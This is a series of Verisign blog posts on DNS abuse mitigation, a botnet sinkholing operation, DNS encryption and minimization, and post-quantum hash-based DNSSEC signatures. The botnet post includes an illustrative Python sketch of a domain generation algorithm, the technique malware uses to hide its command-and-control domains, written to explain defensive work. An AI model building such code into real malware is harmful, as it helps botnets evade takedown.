The ICANN Organization continues to develop new initiatives to help mitigate DNS security threats, including: (1) expanding DAAR to integrate some country code TLDs, and to eventually include registrar-level reporting; (2) work on COVID domain names; (3) contributions to the development of a Domain Generating Algorithms Framework and facilitating waivers to allow registries and registrars to act on imminent security threats, including botnets at scale; and (4) plans for the ICANN Board to establish a DNS abuse caucus.
As early as 2009, the ICANN community began to identify the need for additional safeguards to help address DNS abuse and security threats, and those community inputs increased over time and have reached a crescendo over the last two years. In the early stages of this community dialogue, the ICANN Governmental Advisory Committee (GAC), via its Public Safety Working Group, identified the need for additional mechanisms to address “criminal activity in the registration of domain names.” In the context of renegotiation of the Registrar Accreditation Agreement (RAA) between ICANN and accredited registrars, and the development of the New gTLD Base Registry Agreement, the GAC played an important and influential role in highlighting this need, providing formal advice to the ICANN Board, which resulted in new requirements for gTLD registry and registrar operators, and new contractual compliance requirements for ICANN.
Following the launch of the 2012 round of new gTLDs, and the finalization of the 2013 amendments to the RAA, several ICANN bylaw-mandated review teams engaged further on the issue of DNS Abuse. These included the Competition, Consumer Trust and Consumer Choice Review Team (CCT-RT), and the second Security, Stability and Resiliency Review Team (SSR2-RT). Both final reports identified and reinforced the need for additional tools to help measure and combat DNS abuse. Also, during this timeframe, the GAC, along with the At-Large Advisory Committee and the Security and Stability Advisory Committee, issued their own respective communiques and formal advice to the ICANN Board reiterating or reinforcing past statements, and providing support for recommendations in the various Review Team reports. Most recently, the SSAC issued SAC 115 titled “SSAC Report on an Interoperable Approach to Addressing Abuse Handling in the DNS.” These ICANN community group inputs have been instrumental in bringing additional focus and/or clarity to the topic of DNS abuse, and have encouraged ICANN and its gTLD registries and registrars to look for improved mechanisms to address the types of abuse within our respective remits.
During 2020 and 2021, ICANN’s gTLD contracted parties have been constructively engaged with other parts of the ICANN community, and with ICANN Org, to advance improved understanding on the topic of DNS security threats, and to identify new and improved mechanisms to enhance the security, stability and resiliency of the domain name registration and resolution systems. Collectively, the registries and registrars have engaged with nearly all groups represented in the ICANN community, and we have produced important documents related to DNS abuse definitions, registry actions, registrar abuse reporting, domain generating algorithms, and trusted notifiers. These all represent significant steps forward in framing the context of the roles, responsibilities and capabilities of ICANN’s gTLD contracted parties, and, consistent with our Letter of Intent commitments, Verisign has been an important contributor, along with our partners, in these Contracted Party House initiatives.
In addition, the gTLD contracted parties and ICANN Organization continue to engage constructively on a number of fronts, including upcoming work on standardized registry reporting, which will help result in better data on abuse mitigation practices that will help to inform community work, future reviews, and provide better visibility into the DNS security landscape.
It is important to note that groups outside of ICANN’s immediate multi-stakeholder community have contributed significantly to the topic of DNS abuse mitigation:
Internet & Jurisdiction Policy Network
The Internet & Jurisdiction Policy Network is a multi-stakeholder organization addressing the tension between the cross-border internet and national jurisdictions. Its secretariat facilitates a global policy process engaging over 400 key entities from governments, the world’s largest internet companies, technical operators, civil society groups, academia and international organizations from over 70 countries. The I&JP has been instrumental in developing multi-stakeholder inputs on issues such as trusted notifier, and Verisign has been a long-time contributor to that work since the I&JP’s founding in 2012.
DNS Abuse Institute
The DNS Abuse Institute was formed in 2021 to develop “outcomes-based initiatives that will create recommended practices, foster collaboration and develop industry-shared solutions to combat the five areas of DNS Abuse: malware, botnets, phishing, pharming, and related spam.” The Institute was created by Public Interest Registry, the registry operator for the .org TLD.
Global Cyber Alliance
The Global Cyber Alliance is a nonprofit organization dedicated to making the internet a safer place by reducing cyber risk. The GCA builds programs, tools and partnerships to sustain a trustworthy internet to enable social and economic progress for all.
ECO “topDNS” DNS Abuse Initiative
Eco is the largest association of the internet industry in Europe. Eco is a long-standing advocate of an “Internet with Responsibility” and of self-regulatory approaches, such as the DNS Abuse Framework. The eco “topDNS” initiative will help bring together stakeholders with an interest in combating and mitigating DNS security threats, and Verisign is a supporter of this new effort.
Other Community Groups
Verisign contributes to the anti-abuse, technical and policy communities: We continuously engage with ICANN and an array of other industry partners to help ensure the continued safe and secure operation of the DNS. For example, Verisign is actively engaged in groups such as the Anti-Phishing Working Group, the Messaging, Malware and Mobile Anti-Abuse Working Group, FIRST and the Internet Engineering Task Force.
As a leader in the domain name industry and DNS ecosystem, Verisign supports and has contributed to the cross-community efforts enumerated above. In addition, Verisign also engages directly by:
An important concept and approach for mitigating illegal and abusive activity online is the ability to engage with and rely upon third-party “trusted notifiers” to identify and report such incidents at the appropriate level in the DNS ecosystem. Verisign has supported and been engaged in the good work of the Internet & Jurisdiction Policy Network since its inception, and we’re encouraged by its recent progress on trusted notifier framing. As mentioned earlier, there are some key questions to be addressed as we consider the viability of engaging trusted notifiers or building trusting notifier entities, to help mitigate illegal and abusive online activity.
Verisign’s recent experience with the U.S. government (NTIA and FDA) in combating illegal online opioid sales has been very helpful in illuminating a possible approach for third-party trusted notifier engagement. As noted, we have also benefited from direct engagement with the Internet Watch Foundation and law enforcement in combating child sexual abuse material (CSAM). These recent examples of third-party engagement have underscored the value of a well-formed and executed notification regime, supported by clear expectations, due diligence and due process.
Discussions around trusted notifiers and an appropriate framework for engagement are under way, and Verisign recently engaged with other registries and registrars to lead the development of such a framework for further discussion within the ICANN community. We have significant expertise and experience as an infrastructure provider within our areas of technical, legal and contractual responsibility, and we are aggressive in protecting our operations from bad actors. But in matters related to illegal or abusive content, we need and value contributions from third parties to appropriately identify such behavior when supported by necessary evidence and due diligence. Precisely how such third-party notifications can be formalized and supported at scale is an open question, but one that requires further exploration and work. Verisign is committed to continuing to contribute to these ongoing discussions as we work to mitigate illegal and abusive threats to the security, stability and resiliency of the internet.
Over the last several years, DNS abuse and DNS-related security threat mitigation has been a very important topic of discussion in and around the ICANN community. In cooperation with ICANN, contracted parties, and other groups within the ICANN community, the DNS ecosystem including Verisign has been constructively engaged in developing a common understanding and practical work to advance these efforts, with a goal of meaningfully reducing the level and impact of malicious activity in the DNS. In addition to its contractual compliance functions, ICANN’s contributions have been important in helping to advance this important work and it continues to have a critical coordination and facilitation function that brings the ICANN community together on this important topic. The ICANN community’s recent focus on DNS abuse has been helpful, significant progress has been made, and more work is needed to ensure continued progress in mitigating DNS security threats. As we look ahead to 2022, we are committed to collaborating constructively with ICANN and the ICANN community to deliver on these important goals.
The post Ongoing Community Work to Mitigate Domain Name System Security Threats appeared first on Verisign Blog.
The global internet, from the perspective of its billions of users, has often been envisioned as a cloud — a shapeless structure that connects users to applications and to one another, with the internal details left up to the infrastructure operators inside.
From the perspective of the infrastructure operators, however, the global internet is a network of networks. It’s a complex set of connections among network operators, application platforms, content providers and other parties.
And just as the total amount of global internet traffic continues to grow, so too does the shape and structure of the internet — the internal details of the cloud — continue to evolve.
At the Association for Computing Machinery’s Special Interest Group on Data Communications (ACM SIGCOMM) conference in 2010, researchers at Arbor Networks and the University of Michigan, including Danny McPherson, now executive vice president and chief security officer at Verisign, published one of the first papers to analyze the internal structure of the internet in detail.
The study, entitled “Internet Inter-Domain Traffic,” drew from two years of measurements involving more than 200 exabytes of data.
One of the paper’s key observations was the emergence of a “global internet core” of a relatively small number of large application and content providers that had become responsible for the majority of the traffic between different parts of the internet — in contrast to the previous topology where large network operators were the primary source.
The authors’ conclusion: “we expect the trend towards internet inter-domain traffic consolidation to continue and even accelerate.”
The paper’s predictions of internet traffic and topology trends proved out over the past decade, as confirmed by one of the paper’s authors, Craig Labovitz, in a 2019 presentation that reiterated the paper’s main findings: the internet is “getting bigger by traffic volume” while also “rapidly getting smaller by concentration of content sources.”
This week, the ACM SIGCOMM 2021 conference series recognized the enduring value of the research with the prestigious Test of Time Paper Award, given to a paper “deemed to be an outstanding paper whose contents are still a vibrant and useful contribution today.”
Internet measurement research is particularly relevant to Domain Name System (DNS) operators such as Verisign. To optimize the deployment of their services, DNS operators need to know where DNS query traffic is most likely to be exchanged in the coming years. Insights into the internal structure of the internet can help DNS operators ensure the ongoing security, stability and resiliency of their services, for the benefit both of other infrastructure operators who depend on DNS, and the billions of users who connect online every day.
Congratulations to Danny and co-authors Craig Labovitz, Scott Iekel-Johnson, Jon Oberheide and Farnam Jahanian on receiving this award, and thanks to ACM SIGCOMM for its recognition of the research. If you’re curious about what evolutionary developments Danny and others at Verisign are envisioning today about the internet of the future, subscribe to the Verisign blog, and follow us on Twitter and LinkedIn.
The post The Test of Time at Internet Scale: Verisign’s Danny McPherson Recognized with ACM SIGCOMM Award appeared first on Verisign Blog.
Note: This article originally appeared in Verisign’s Q1 2021 Domain Name Industry Brief.
This article expands on observations of botnet traffic at various levels of the Domain Name System (DNS) hierarchy, presented at DNS-OARC 35.
Addressing DNS abuse and maintaining a healthy DNS ecosystem are important components of Verisign’s commitment to being a responsible steward of the internet. We continuously engage with the Internet Corporation for Assigned Names and Numbers (ICANN) and other industry partners to help ensure the secure, stable and resilient operation of the DNS.
Based on recent telemetry data from Verisign’s authoritative top-level domain (TLD) name servers, Verisign observed a widespread botnet responsible for a disproportionate amount of total global DNS queries – and, in coordination with several registrars, registries and ICANN, acted expeditiously to remediate it.
Just prior to Verisign taking action to remediate the botnet, upwards of 27.5 billion queries per day were being sent to Verisign’s authoritative TLD name servers, accounting for roughly 10% of Verisign’s total DNS traffic. That amount of query volume in most DNS environments would be considered a sustained distributed denial-of-service (DDoS) attack.
These queries were associated with a particular piece of malware that emerged in 2018 and spread throughout the internet to create a global botnet infrastructure. Botnets provide a substrate from which malicious actors can, in theory, perform all manner of malicious activity – executing DDoS attacks, exfiltrating data, sending spam, conducting phishing campaigns or even installing ransomware – because the malware can download and execute any other type of payload the malicious actor desires.
Malware authors often apply various forms of evasion techniques to protect their botnets from being detected and remediated. A Domain Generation Algorithm (DGA) is an example of such an evasion technique.
DGAs are seen in various families of malware that periodically generate a number of domain names, which can be used as rendezvous points for botnet command-and-control servers. By using a DGA to build the list of domain names, the malicious actor makes it more difficult for security practitioners to identify what domain names will be used and when. Only by exhaustively reverse-engineering a piece of malware can the definitive set of domain names be ascertained.
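To make the concept concrete, the sketch below shows how a generic DGA might derive a day’s candidate rendezvous domains from a seed and the current date. It is purely illustrative; the seed, hashing scheme and TLD list are hypothetical assumptions and do not correspond to the malware family discussed in this article.

```python
import hashlib
from datetime import date

def example_dga(seed: str, day: date, count: int = 10, tlds=(".com", ".net", ".cc")):
    """Illustrative DGA: derives pseudo-random domain names from a seed and a date.

    A simplified sketch for explanation only; real malware families use their
    own (often reverse-engineered) algorithms, seeds and schedules.
    """
    domains = []
    for i in range(count):
        material = f"{seed}|{day.isoformat()}|{i}".encode()
        digest = hashlib.sha256(material).hexdigest()
        # Map the first 12 hex characters to lowercase letters to form a label.
        label = "".join(chr(ord("a") + int(c, 16) % 26) for c in digest[:12])
        domains.append(label + tlds[i % len(tlds)])
    return domains

# Both the bots and their operator can compute today's rendezvous points,
# but defenders must reverse-engineer the algorithm to predict them.
print(example_dga("sample-seed", date(2021, 1, 7)))
```

Because the bots query whichever names the algorithm yields, most of the generated names never need to be registered, which is one reason so many of these queries surface as non-existent-domain traffic at the upper levels of the DNS.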
The choices miscreants make when tailoring a malware DGA directly influence the DGA’s ability to evade detection. For instance, electing to use more TLDs and a larger number of domain names in a given time period makes the malware’s operation more difficult to disrupt; however, this approach also generates more network noise, making it easier for security and network teams to identify anomalous traffic patterns. Likewise, a DGA that uses a limited number of TLDs and domain names generates significantly less network noise but is more fragile and susceptible to remediation.
Botnets that implement DGAs or otherwise rely on registered domain names clearly represent an abuse “of the DNS,” as opposed to other types of abuse that are executed “via the DNS,” such as phishing. This is an important distinction the DNS community should consider as it continues to refine the scope of DNS abuse and how the various abuses can be remediated.
The remediation of domain names used by botnets as rendezvous points poses numerous operational challenges. The set of domain names must be identified and investigated to determine their current registration status. Risk assessments must be performed on registered domain names to determine whether additional actions should be taken, such as sending registrar notifications, issuing requests to transfer domain names, adding Extensible Provisioning Protocol (EPP) hold statuses or altering delegation records. There are also timing and coordination elements that must be balanced with external entities, such as ICANN, law enforcement, Computer Emergency Readiness Teams (CERTs) and contracted parties, including registrars and registries. Other technical measures also need to be considered, designed and deployed to achieve the desired remediation goal.
After coordinating with ICANN, and several registrars and registries, Verisign registered the remaining available botnet domain names and began a three-phase plan to sinkhole those domain names. Ultimately, this remediation effort would reduce the traffic sent to Verisign authoritative name servers and effectively eliminate the botnet’s ability to use command-and-control domain names within Verisign-operated TLDs.
Figure 1 below shows the amount of botnet traffic Verisign authoritative name servers received prior to intervention, and throughout the process of registering, delegating and sinkholing the botnet domain names.
Phase one was executed on Dec. 21, 2020, when 100 .cc domain names were configured to resolve to Verisign-operated sinkhole servers; traffic at Verisign’s authoritative name servers quickly decreased. The second group, 500 .com and .net domain names, was sinkholed on Jan. 7, 2021, and again traffic volume quickly decreased. The final group of 879 .com and .net domain names was sinkholed on Jan. 13, 2021. By the end of phase three, the cumulative DNS traffic reduction surpassed 25 billion queries per day. Verisign kept approximately 10 percent of the botnet domain names on serverHold as a control group, to better understand how sinkholing affects query volume at the child and parent zones. Verisign believes that sinkholing these remaining domain names would reduce authoritative name server traffic by an additional one billion queries per day.
This botnet highlights the remarkable Pareto-like distribution of DNS query traffic: a few thousand domain names, within namespaces containing more than 165 million domain names, demand a vastly disproportionate share of DNS resources.
What causes the amplification of DNS traffic volume for non-existent domain names to occur at the upper levels of the DNS hierarchy? Verisign is conducting a variety of measurements on the sinkholed botnet domain names to better understand the caching behavior of the resolver population. We are observing some interesting traffic changes at the TLD and root name servers when time to live (TTL) and response codes are altered at the sinkhole servers. Stay tuned.
In addition to remediating this botnet in late 2020 and into early 2021, Verisign extended its already four-year endeavor to combat the Avalanche botnet family. Since 2016, the Avalanche botnet had been significantly impacted due to actions taken by Verisign and an international consortium of law enforcement, academic and private organizations. However, many of the underlying Avalanche-compromised machines are still not remediated, and the threat from Avalanche could increase again if additional actions are not taken. To prevent this from happening, Verisign, in coordination with ICANN and other industry partners, is using a variety of tools to ensure Avalanche command-and-control domain names cannot be used in Verisign-operated TLDs.
Botnets are a persistent issue. And as long as they exist as a threat to the security, stability and resiliency of the DNS, cross-industry coordination and collaboration will continue to lie at the core of combating them.
This piece was co-authored by Matt Thomas and Duane Wessels, distinguished engineers at Verisign.
The post Industry Insights: Verisign, ICANN and Industry Partners Collaborate to Combat Botnets appeared first on Verisign Blog.
This is the final in a multi-part series on cryptography and the Domain Name System (DNS).
In previous posts in this series, I’ve discussed a number of applications of cryptography to the DNS, many of them related to the Domain Name System Security Extensions (DNSSEC).
In this final blog post, I’ll turn attention to another application that may appear at first to be the most natural, though as it turns out, may not always be the most necessary: DNS encryption. (I’ve also written about DNS encryption as well as minimization in a separate post on DNS information protection.)
In 2014, the Internet Engineering Task Force (IETF) chartered the DNS PRIVate Exchange (dprive) working group to start work on encrypting DNS queries and responses exchanged between clients and resolvers.
That work resulted in RFC 7858, published in 2016, which describes how to run the DNS protocol over the Transport Layer Security (TLS) protocol, also known as DNS over TLS, or DoT.
DNS encryption between clients and resolvers has since gained further momentum, with multiple browsers and resolvers supporting DNS over Hypertext Transfer Protocol Secure (HTTPS), known as DoH, with the formation of the Encrypted DNS Deployment Initiative, and with further enhancements such as oblivious DoH.
The dprive working group turned its attention to the resolver-to-authoritative exchange during its rechartering in 2018. And in October of last year, ICANN’s Office of the CTO published its strategy recommendations for the ICANN-managed Root Server (IMRS, i.e., the L-Root Server), an effort motivated in part by concern about potential “confidentiality attacks” on the resolver-to-root connection.
From a cryptographer’s perspective the prospect of adding encryption to the DNS protocol is naturally quite interesting. But this perspective isn’t the only one that matters, as I’ve observed numerous times in previous posts.
A common theme in this series on cryptography and the DNS has been the question of whether the benefits of a technology are sufficient to justify its cost and complexity.
This question came up not only in my review of two newer cryptographic advances, but also in my remarks on the motivation for two established tools for providing evidence that a domain name doesn’t exist.
Recall that the two tools — the Next Secure (NSEC) and Next Secure 3 (NSEC3) records — were developed because a simpler approach didn’t have an acceptable risk / benefit tradeoff. In the simpler approach, to provide a relying party assurance that a domain name doesn’t exist, a name server would return a response, signed with its private key, “<name> doesn’t exist.”
From a cryptographic perspective, the simpler approach would meet its goal: a relying party could then validate the response with the corresponding public key. However, the approach would introduce new operational risks, because the name server would now have to perform online cryptographic operations.
The name server would not only have to protect its private key from compromise, but would also have to protect the cryptographic operations from overuse by attackers. That could open another avenue for denial-of-service attacks that could prevent the name server from responding to legitimate requests.
The designers of DNSSEC mitigated these operational risks by developing NSEC and NSEC3, which gave operators the option of moving the private key and the cryptographic operations offline, into the name server’s provisioning system. This alternative struck a better balance between cryptography and operations. The same theme is now returning to view in the recent efforts around DNS encryption.
Like the simpler initial approach for authentication, DNS encryption may meet its goal from a cryptographic perspective. But the operational perspective is important as well. As designers again consider where and how to deploy private keys and cryptographic operations across the DNS ecosystem, alternatives with a better balance are a desirable goal.
In addition to encryption, there has been research into other, possibly lower-risk alternatives that can be used in place of or in addition to encryption at various levels of the DNS.
Collectively, we call these minimization techniques.
In “textbook” DNS resolution, a resolver sends the same full domain name to a root server, a top-level domain (TLD) server, a second-level domain (SLD) server, and any other server in the chain of referrals, until it ultimately receives an authoritative answer to a DNS query.
This is the way that DNS resolution has been practiced for decades, and it’s also one of the reasons for the recent interest in protecting information on the resolver-to-authoritative exchange: The full domain name is more information than all but the last name server needs to know.
One such minimization technique, known as qname minimization, was identified by Verisign researchers in 2011 and documented in RFC 7816 in 2016. (In 2015, Verisign announced a royalty-free license to its qname minimization patents.)
With qname minimization, instead of sending the full domain name to each name server, the resolver sends only as much as the name server needs either to answer the query or to refer the resolver to a name server at the next level. This follows the principle of minimum disclosure: the resolver sends only as much information as the name server needs to “do its job.” As Matt Thomas described in his recent blog post on the topic, nearly half of all queries received by Verisign’s .com and .net TLD servers were in a minimized form as of August 2020.
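As a rough illustration of the difference, the sketch below shows the sequence of query names a minimizing resolver might send while walking the delegation chain, versus the single full name used in “textbook” resolution. The example name is hypothetical, and real resolver implementations handle query types, caching and zone cuts with considerably more nuance.

```python
def minimized_qnames(full_name: str):
    """Sketch of qname minimization (RFC 7816): at each step of the referral
    chain, the resolver reveals only enough labels for that server to delegate.
    Illustrative only; real resolvers also vary the query type and handle zone
    cuts that don't fall neatly on label boundaries."""
    labels = full_name.rstrip(".").split(".")
    queries = []
    # Walk from the TLD down toward the full name, adding one label per step.
    for depth in range(1, len(labels) + 1):
        queries.append(".".join(labels[-depth:]) + ".")
    return queries

# Traditional resolution would send "www.example.com." to every server in the
# chain; a minimizing resolver sends progressively longer names instead.
print(minimized_qnames("www.example.com"))
# ['com.', 'example.com.', 'www.example.com.']
```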
Other techniques that are part of this new chapter in DNS protocol evolution include NXDOMAIN cut processing [RFC 8020] and aggressive DNSSEC caching [RFC 8198]. Both leverage information present in the DNS to reduce the amount and sensitivity of DNS information exchanged with authoritative name servers. In aggressive DNSSEC caching, for example, the resolver analyzes NSEC and NSEC3 range proofs obtained in response to previous queries to determine on its own whether a domain name doesn’t exist. This means that the resolver doesn’t always have to ask the authoritative server system about a domain name it hasn’t seen before.
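The sketch below illustrates the idea behind aggressive DNSSEC caching in simplified form: a resolver that has cached validated NSEC-style ranges can conclude locally that a name does not exist. The cached ranges here are taken from the .arpa example discussed later in this series; the sketch uses plain string comparison in place of DNSSEC’s canonical ordering and omits signature validation, TTLs and NSEC3 hashing, so it is an assumption-laden illustration rather than an implementation of RFC 8198.

```python
# Validated non-existence ranges previously obtained from an authoritative
# server, stored as (owner, next) pairs. Real resolvers compare names in
# DNSSEC canonical order, not simple string order.
cached_ranges = [
    ("e164.arpa.", "home.arpa."),
    ("in-addr.arpa.", "ip6.arpa."),
]

def covered_by_cache(qname: str) -> bool:
    """Return True if a cached range already proves that qname doesn't exist."""
    return any(start < qname < end for start, end in cached_ranges)

# "example.arpa." sorts between "e164.arpa." and "home.arpa.", so the resolver
# can answer NXDOMAIN itself instead of asking the .arpa servers again.
print(covered_by_cache("example.arpa."))   # True
print(covered_by_cache("ip6.arpa."))       # False: an endpoint is an existing name
```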
All of these techniques, as well as additional minimization alternatives I haven’t mentioned, have one important common characteristic: they only change how the resolver operates during the resolver-authoritative exchange. They have no impact on the authoritative name server or on other parties during the exchange itself. They thereby mitigate disclosure risk while also minimizing operational risk.
The resolver’s exchanges with authoritative name servers, prior to minimization, were already relatively less sensitive because they represented aggregate interests of the resolver’s many clients1. Minimization techniques lower the sensitivity even further at the root and TLD levels: the resolver sends only its aggregate interests in TLDs to root servers, and only its interests in SLDs to TLD servers. The resolver still sends the aggregate interests in full domain names at the SLD level and below2, and may also include certain client-related information at these levels, such as the client-subnet extension. The lower levels therefore may have different protection objectives than the upper levels.
Minimization techniques and encryption together give DNS designers additional tools for protecting DNS information — tools that when deployed carefully can balance between cryptographic and operational perspectives.
These tools complement those I’ve described in previous posts in this series. Some have already been deployed at scale, such as DNSSEC with its NSEC and NSEC3 non-existence proofs. Others are at various earlier stages, like NSEC5 and tokenized queries, and still others contemplate “post-quantum” scenarios and how to address them. (And there are yet other tools that I haven’t covered in this series, such as authenticated resolution and adaptive resolution.)
Modern cryptography is just about as old as the DNS. Both have matured since their introduction in the late 1970s and early 1980s respectively. Both bring fundamental capabilities to our connected world. Both continue to evolve to support new applications and to meet new security objectives. While they’ve often moved forward separately, as this blog series has shown, there are also opportunities for them to advance together. I look forward to sharing more insights from Verisign’s research in future blog posts.
1. This argument obviously holds more weight for large resolvers than for small ones — and doesn’t apply for the less common case of individual clients running their own resolvers. However, small resolvers and individual clients seeking additional protection retain the option of sending sensitive queries through a large, trusted resolver, or through a privacy-enhancing proxy. The focus in our discussion is primarily on large resolvers.
2. In namespaces where domain names are registered at the SLD level, i.e., under an effective TLD, the statements in this note about “root and TLD” and “SLD level and below” should be “root through effective TLD” and “below effective TLD level.” For simplicity, I’ve placed the “zone cut” between TLD and SLD in this note.
The post Information Protection for the Domain Name System: Encryption and Minimization appeared first on Verisign Blog.
This is the fifth in a multi-part series on cryptography and the Domain Name System (DNS).
In my last article, I described efforts underway to standardize new cryptographic algorithms that are designed to be less vulnerable to potential future advances in quantum computing. I also reviewed operational challenges to be considered when adding new algorithms to the DNS Security Extensions (DNSSEC).
In this post, I’ll look at hash-based signatures, a family of post-quantum algorithms that could be a good match for DNSSEC from the perspective of infrastructure stability.
I’ll also describe Verisign Labs research into a new concept called synthesized zone signing keys that could mitigate the impact of the large signature size for hash-based signatures, while still maintaining this family’s protections against quantum computing.
(Caveat: The concepts reviewed in this post are part of Verisign’s long-term research program and do not necessarily represent Verisign’s plans or positions on new products or services. Concepts developed in our research program may be subject to U.S. and/or international patents and/or patent applications.)
The DNS community’s root key signing key (KSK) rollover illustrates how complicated a change to DNSSEC infrastructure can be. Although successfully accomplished, this change was delayed by ICANN to ensure that enough resolvers had the public key required to validate signatures generated with the new root KSK private key.
Now imagine the complications if the DNS community also had to ensure that enough resolvers not only had a new key but also had a brand-new algorithm.
Imagine further what might happen if a weakness in this new algorithm were to be found after it was deployed. While there are procedures for emergency key rollovers, emergency algorithm rollovers would be more complicated, and perhaps controversial as well if a clear successor algorithm were not available.
I’m not suggesting that any of the post-quantum algorithms that might be standardized by NIST will be found to have a weakness. But confidence in cryptographic algorithms can be gained and lost over many years, sometimes decades.
From the perspective of infrastructure stability, therefore, it may make sense for DNSSEC to have a backup post-quantum algorithm built in from the start — one for which cryptographers already have significant confidence and experience. This algorithm might not be as efficient as other candidates, but there is less of a chance that it would ever need to be changed. This means that the more efficient candidates could be deployed in DNSSEC with the confidence that they have a stable fallback. It’s also important to keep in mind that the prospect of quantum computing is not the only reason system developers need to be considering new algorithms from time to time. As public-key cryptography pioneer Martin Hellman wisely cautioned, new classical (non-quantum) attacks could also emerge, whether or not a quantum computer is realized.
The 1970s were a foundational time for public-key cryptography, producing not only the RSA algorithm and the Diffie-Hellman algorithm (which also provided the basic model for elliptic curve cryptography), but also hash-based signatures, invented in 1979 by another public-key cryptography founder, Ralph Merkle.
Hash-based signatures are interesting because their security depends only on the security of an underlying hash function.
It turns out that hash functions, as a concept, hold up very well against quantum computing advances — much better than currently established public-key algorithms do.
This means that Merkle’s hash-based signatures, now more than 40 years old, can rightly be considered the oldest post-quantum digital signature algorithm.
If it turns out that an individual hash function doesn’t hold up — whether against a quantum computer or a classical computer — then the hash function itself can be replaced, as cryptographers have been doing for years. That will likely be easier than changing to an entirely different post-quantum algorithm, especially one that involves very different concepts.
The conceptual stability of hash-based signatures is a reason that interoperable specifications are already being developed for variants of Merkle’s original algorithm. Two approaches are described in RFC 8391, “XMSS: eXtended Merkle Signature Scheme” and RFC 8554, “Leighton-Micali Hash-Based Signatures.” Another approach, SPHINCS+, is an alternate in NIST’s post-quantum project.
Hash-based signatures can potentially be applied to any part of the DNSSEC trust chain. For example, in Figure 1, the DNS record sets can be signed with a zone signing key (ZSK) that employs a hash-based signature algorithm.
The main challenge with hash-based signatures is that the signature size is large, on the order of tens or even hundreds of thousands of bits. This is perhaps why they haven’t seen significant adoption in security protocols over the past four decades.
Verisign Labs has been exploring how to mitigate the size impact of hash-based signatures on DNSSEC while still basing security only on hash functions, in the interest of stable post-quantum protections.
One of the ideas we’ve come up with uses another of Merkle’s foundational contributions: Merkle trees.
Merkle trees authenticate multiple records by hashing them together in a tree structure. The records are the “leaves” of the tree. Pairs of leaves are hashed together to form a branch, then pairs of branches are hashed together to form a larger branch, and so on. The hash of the final pair of branches is the tree’s “root.” (This is a data-structure root, unrelated to the DNS root.)
Each individual leaf of a Merkle tree can be authenticated by retracing the “path” from the leaf to the root. The path consists of the hashes of each of the adjacent branches encountered along the way.
Authentication paths can be much shorter than typical hash-based signatures. For instance, with a tree depth of 20 and a 256-bit hash value, the authentication path for a leaf would only be 5,120 bits long, yet a single tree could authenticate more than a million leaves.
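To make the path arithmetic concrete, here is a minimal sketch of a Merkle tree with authentication-path generation and verification. The record names are hypothetical placeholders, the tree-building details (such as duplicating an odd node) are one arbitrary choice among several, and the sketch describes a generic Merkle construction rather than any deployed DNSSEC mechanism.

```python
import hashlib

def h(data: bytes) -> bytes:
    return hashlib.sha256(data).digest()

def build_tree(leaves):
    """Build a Merkle tree; returns a list of levels, hashed leaves first, root last."""
    level = [h(leaf) for leaf in leaves]
    levels = [level]
    while len(level) > 1:
        if len(level) % 2 == 1:                     # duplicate the last node on odd levels
            level = level + [level[-1]]
        level = [h(level[i] + level[i + 1]) for i in range(0, len(level), 2)]
        levels.append(level)
    return levels

def auth_path(levels, index):
    """Collect the sibling hashes needed to retrace a leaf to the root."""
    path = []
    for level in levels[:-1]:
        if len(level) % 2 == 1:
            level = level + [level[-1]]
        path.append((index % 2, level[index ^ 1]))  # (am I the right child?, sibling hash)
        index //= 2
    return path

def verify(leaf, path, root):
    """Recompute the root from a leaf and its authentication path."""
    node = h(leaf)
    for is_right, sibling in path:
        node = h(sibling + node) if is_right else h(node + sibling)
    return node == root

# Hypothetical "record sets" standing in for the data to be authenticated.
records = [f"record-set-{i}".encode() for i in range(8)]
levels = build_tree(records)
root = levels[-1][0]                    # this value would play the role of the ZSK public key
path = auth_path(levels, index=5)
print(verify(records[5], path, root))   # True: the path serves as the record's "signature"
```

With eight leaves the path carries three sibling hashes; at a depth of 20 it would carry 20, matching the 20 × 256 = 5,120 bits mentioned above.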
Returning to the example above, suppose that instead of signing each DNS record set with a hash-based signature, each record set were considered a leaf of a Merkle tree. Suppose further that the root of this tree were to be published as the ZSK public key (see Figure 2). The authentication path to the leaf could then serve as the record set’s signature.
The validation logic at a resolver would be essentially the same as in ordinary DNSSEC.
The only difference on the resolver’s side would be that signature validation would involve retracing the authentication path to the ZSK public key, rather than a conventional signature validation operation.
The ZSK public key produced by the Merkle tree approach would be a “synthesized” public key, in that it is obtained from the records being signed. This is noteworthy from a cryptographer’s perspective, because the public key wouldn’t have a corresponding private key, yet the DNS records would still, in effect, be “signed by the ZSK!”
In this type of DNSSEC implementation, the Merkle tree approach only applies to the ZSK level. Hash-based signatures would still be applied at the KSK level, although their overhead would now be “amortized” across all records in the zone.
In addition, each new ZSK would need to be signed “on demand,” rather than in advance, as in current operational practice.
This leads to tradeoffs, such as how many changes to accumulate before constructing and publishing a new tree. With fewer changes, a new tree can be published sooner; with more changes, the tree will be larger, so the per-record overhead of the signatures at the KSK level will be lower.
My last few posts have discussed cryptographic techniques that could potentially be applied to the DNS in the long term — or that might not even be applied at all. In my next post, I’ll return to more conventional subjects, and explain how Verisign sees cryptography fitting into the DNS today, as well as some important non-cryptographic techniques that are part of our vision for a secure, stable and resilient DNS.
The post Securing the DNS in a Post-Quantum World: Hash-Based Signatures and Synthesized Zone Signing Keys appeared first on Verisign Blog.
This is the fourth in a multi-part series on cryptography and the Domain Name System (DNS).
One of the “key” questions cryptographers have been asking for the past decade or more is what to do about the potential future development of a large-scale quantum computer.
If theory holds, a quantum computer could break established public-key algorithms including RSA and elliptic curve cryptography (ECC), building on Peter Shor’s groundbreaking result from 1994.
This prospect has motivated research into new so-called “post-quantum” algorithms that are less vulnerable to quantum computing advances. These algorithms, once standardized, may well be added into the Domain Name System Security Extensions (DNSSEC) — thus also adding another dimension to a cryptographer’s perspective on the DNS.
(Caveat: Once again, the concepts I’m discussing in this post are topics we’re studying in our long-term research program as we evaluate potential future applications of technology. They do not necessarily represent Verisign’s plans or position on possible new products or services.)
The National Institute of Standards and Technology (NIST) started a Post-Quantum Cryptography project in 2016 to “specify one or more additional unclassified, publicly disclosed digital signature, public-key encryption, and key-establishment algorithms that are capable of protecting sensitive government information well into the foreseeable future, including after the advent of quantum computers.”
Security protocols that NIST is targeting for these algorithms, according to its 2019 status report (Section 2.2.1), include: “Transport Layer Security (TLS), Secure Shell (SSH), Internet Key Exchange (IKE), Internet Protocol Security (IPsec), and Domain Name System Security Extensions (DNSSEC).”
The project is now in its third round, with seven finalists, including three digital signature algorithms, and eight alternates.
NIST’s project timeline anticipates that the draft standards for the new post-quantum algorithms will be available between 2022 and 2024.
